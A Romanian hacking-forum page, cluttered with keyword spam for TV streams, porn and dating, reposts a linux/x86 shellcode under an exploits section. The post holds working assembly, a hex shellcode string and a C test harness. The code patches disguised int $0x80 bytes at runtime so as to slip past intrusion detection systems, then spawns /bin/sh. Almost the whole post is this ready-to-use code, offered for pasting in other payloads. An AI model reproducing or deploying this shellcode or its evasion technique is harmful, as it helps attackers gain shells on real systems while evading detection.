Hack Forums,Cryptography, Encryption, and DecryTV Online,Dolce Sport Live,GSP SI DIGI SPORT ONLINE,FileList si Openetwork,Yahoo Invisible Check,Hack,windows,linux,games,cs,arhiva,psybnc,mirc,scan,ssh,free porn movie,xxx,sex,Digi keyMatrimoniale,Wantedsoft
Welcome to www.team3d.3xforum.ro GSP SI DIGI SPORT ONLINE,FileList si Openetwork,Yahoo Invisible Check,Hack,windows,linux,games,cs,arhiva,psybnc,mirc,scan,ssh 		Lista Forumurilor Pe Tematici
Hack Forums,Cryptography, Encryption, and DecryTV Online,Dolce Sport Live,GSP SI DIGI SPORT ONLINE,FileList si Openetwork,Yahoo Invisible Check,Hack,windows,linux,games,cs,arhiva,psybnc,mirc,scan,ssh,free porn movie,xxx,sex,Digi keyMatrimoniale,Wantedsoft | Reguli | Inregistrare | Login

POZE HACK FORUMS,CRYPTOGRAPHY, ENCRYPTION, AND DECRYTV ONLINE,DOLCE SPORT LIVE,GSP SI DIGI SPORT ONLINE,FILELIST SI OPENETWORK,YAHOO INVISIBLE CHECK,HACK,WINDOWS,LINUX,GAMES,CS,ARHIVA,PSYBNC,MIRC,SCAN,SSH,FREE PORN MOVIE,XXX,SEX,DIGI KEYMATRIMONIALE,WANTEDSOFT

Nu sunteti logat. 		Nou pe simpatie:
Elena01 pe Simpatie
Femeie
25 ani
Braila
cauta Barbat
28 - 40 ani
Hack Forums,Cryptography, Encryption, and DecryTV Online,Dolce Sport Live,GSP SI DIGI SPORT ONLINE,FileList si Openetwork,Yahoo Invisible Check,Hack,windows,linux,games,cs,arhiva,psybnc,mirc,scan,ssh,free porn movie,xxx,sex,Digi keyMatrimoniale,Wantedsoft / Exploits,vulnerabilities,videos,shellcode / linux/x86 Self-modifying shellcode for IDS evasion 64 bytes Moderat de Anonymus
Autor
Mesaj Pagini: 1
[ESP][D][M][X]Team**3D**
Administrator

Inregistrat: acum 18 ani
Postari: 78239
/*
    _  __                 __  ___      __
   | |/ /__  ____  ____  /  |/  /_  __/ /_____ _
   |   / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/
  /   /  __/ / / / /_/ / /  / / /_/ / /_/ /_/ /
/_/|_\___/_/ /_/\____/_/  /_/\__,_/\__/\__,_/

xenomuta\x40phreaker\x2enet
- Methylxantina 256mg

Description:
linux/x86 Self-modifying ShellCode for IDS evasion
creates int $0x80 syscalls on runtime.

OS: Linux
Arch: x86
Length: 64 bytes ( 35 without /bin/sh payload )
Author: XenoMuta

hola at:
  str0k3, garay, fr1t0l4y, emra.
  - God bless you all -

=== SOURCE CODE ====
.globl _start
_start:
    jmp _findOut   
_WhereAmI:
    pop %edx    // Save our payload's address g20
    mov %edx, %esi    // and save it 4 later
_loopMakeInt80s:
    mov (%edx), %eax
    cmpw $0x7dca, %ax    // Find this guy ( 0x7dca ) and
    jne _no
    addw $0x303, %ax    // 0x7dca + 0x303 == 0x80cd ( int $0x80 )
    mov %eax, (%edx)
_no:
    incb %dl
    cmp $0x41414141, %eax    // Use 'AAAA' as end Marker.
    jne _loopMakeInt80s   
    jmp *%esi        // Jump to our converted code when done
_findOut:
    call _WhereAmI
_payload:            // Paste your shell code here and then replace
    xor %edx, %edx        // "\xcd\x80" (int $0x80) for .ascii "\xca7d"
    push $0xb        // and end with .ascii "AAAA" as end marker
    pop %eax
    cltd
    push %edx
    push $0x68732f2f
    push $0x6e69622f
    mov %esp, %ebx
    push %edx
    push %ebx
    mov %esp,%ecx
    .ascii "\xca\x7d" // + 0x303 = 0xcd80 (int $0x80)
    .ascii "AAAA"
=== SOURCE CODE ====
*/


char shellcode[] = "\xeb\x1c\x5a\x89\xd6\x8b\x02\x66\x3d\xca\x7d\x75\x06\x66\x05\x03\x03\x89\x02\xfe\xc2\x3d\x41\x41\x41\x41\x75\xe9\xff\xe6\xe8\xdf\xff\xff\xff\x31\xd2\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xca\x7d\x41\x41\x41\x41";

int main ()
{
    printf("Length: %d bytes\n", strlen(shellcode));
    int (*sc)() = (int (*)())shellcode;
    sc();
    return 0;
}
pus acum 16 ani
   
Pagini: 1  

Mergi la